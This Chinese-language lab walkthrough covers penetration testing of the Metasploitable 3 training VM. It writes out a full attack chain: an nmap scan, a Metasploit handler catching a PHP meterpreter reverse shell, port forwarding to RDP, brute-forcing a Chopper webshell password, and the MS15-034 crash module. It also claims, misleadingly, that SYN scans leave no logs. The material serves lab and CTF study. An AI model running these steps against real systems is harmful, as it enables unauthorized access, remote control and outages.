Metasploitable 3 渗透测试实战
Metasploitable 3简介
Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。但是还没完,Metasploitable 3 加入了 flag。这样大家就可以在里面开开心心的玩 CTF 啦!
百度网盘:链接:http://pan.baidu.com/s/1geDBBQN密码:aoqc
初始化环境

信息收集
nmap对靶机进行扫描:
nmap -p- -sS -sV -n -v --reason --open -oX demon.xml 10.10.9.102
-sS Tcp SYN Scan (sS)这是一个基本的扫描方式,它被称为半开放扫描 ,Nmap发送SYN包到远程主机,但是它不会产生任何会话.因此不会在目标主机上产生任何日志记录,因为没有形成会话
-sV版本检测是用来扫描目标主机和端口上运行的软件的版本
--open仅仅显示开启的端口
--reason显示端口处于特殊状态
-n不进行dns解析操作 (本地搭建环境,不用dns解析)
-oX XML XML格式 (我们需要导入到metasploit里面,以便我们更好的下次查看)

msfconsole中创建工作环境并导入扫描结果:
msf > workspace -a win08-r2
msf > workspace win08-r2
msf > db_import demon.xml
msf > services

端口与服务验证





漏洞分析、渗透攻击、后渗透攻击
1)WebDAV服务漏洞
WebDAV是基于Web服务的扩展服务。它允许用户像操作本地文件一样,操作服务器上的文件。借助该功能,用户很方便的在网络上存储自己的文件。为了方便用户使用,通常会提供给用户较大的文件权限,如上传、修改甚至是执行权限。Kali Linux提供了一款WebDAV服务漏洞利用工具DAVTest。该工具会自动检测权限,寻找可执行文件的权限。一旦发现,用户就可以上传内置的后门工具,对服务器进行控制。同时,该工具可以上传用户指定的文件,便于后期利用。
DAVTest说明:
DAVTest上传测试的可执行文件,然后(可选)上传文件,允许用于执行命令,或者直接在目标上其他操作测试启用的WebDAV服务器。它的目的是渗透测试快速,轻松地确定是否启用DAV服务攻击。
DAVTest支持:
自动发送文件漏洞
目录自动随机帮助隐藏文件
发送文本文件,并尝试MOVE到可执行文件的名称
上传的文件自动清理
发送任意文件


生成攻击载荷并上传:



开始渗透测试:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter
msf5 exploit(multi/handler) > set LHOST 10.10.9.108
msf5 exploit(multi/handler) > set LPORT 8888
msf5 exploit(multi/handler) > exploit



尝试建立远程桌面连接:
meterpreter > portfwd add -l 888 -p 3389 -r 10.10.9.102
在kali主机上尝试连接:

2)SSH测试:
ssh -L 3389:localhost:3389 vagrant@192.168.1.148
利用ssh 来做一个端口转发强制开启3389端口,服务器本身就有防火墙,在nmap也扫不到。

在kali上尝试连接:

3)尝试连接中国菜刀

msf > search caidao
msf > use auxiliary/scanner/http/caidao_bruteforce_login
msf auxiliary(scanner/http/caidao_bruteforce_login) > set RHOSTS 10.10.9.102
msf auxiliary(scanner/http/caidao_bruteforce_login) > set TARGETURI /caidao.asp
msf auxiliary(scanner/http/caidao_bruteforce_login) > run
[-] 192.168.56.101:80 - Failed: '123456789'
[+] 192.168.56.101:80 - Success: 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

4)80端口--http
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞(远程蓝屏代码)
微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012
R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响
msf > search ms15_034
msf > use auxiliary/dos/http/ms15_034_ulonglongadd
msf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 10.10.9.102

触发蓝屏:

Metasploitable 3相对于于ubuntun版的Metasploitable 2(个人理解是metasploit操作实验),内置一些安全机制,比如防火墙,权限设置等,是一个很不错的靶场,假如还有其他好玩点请师傅们多多指教!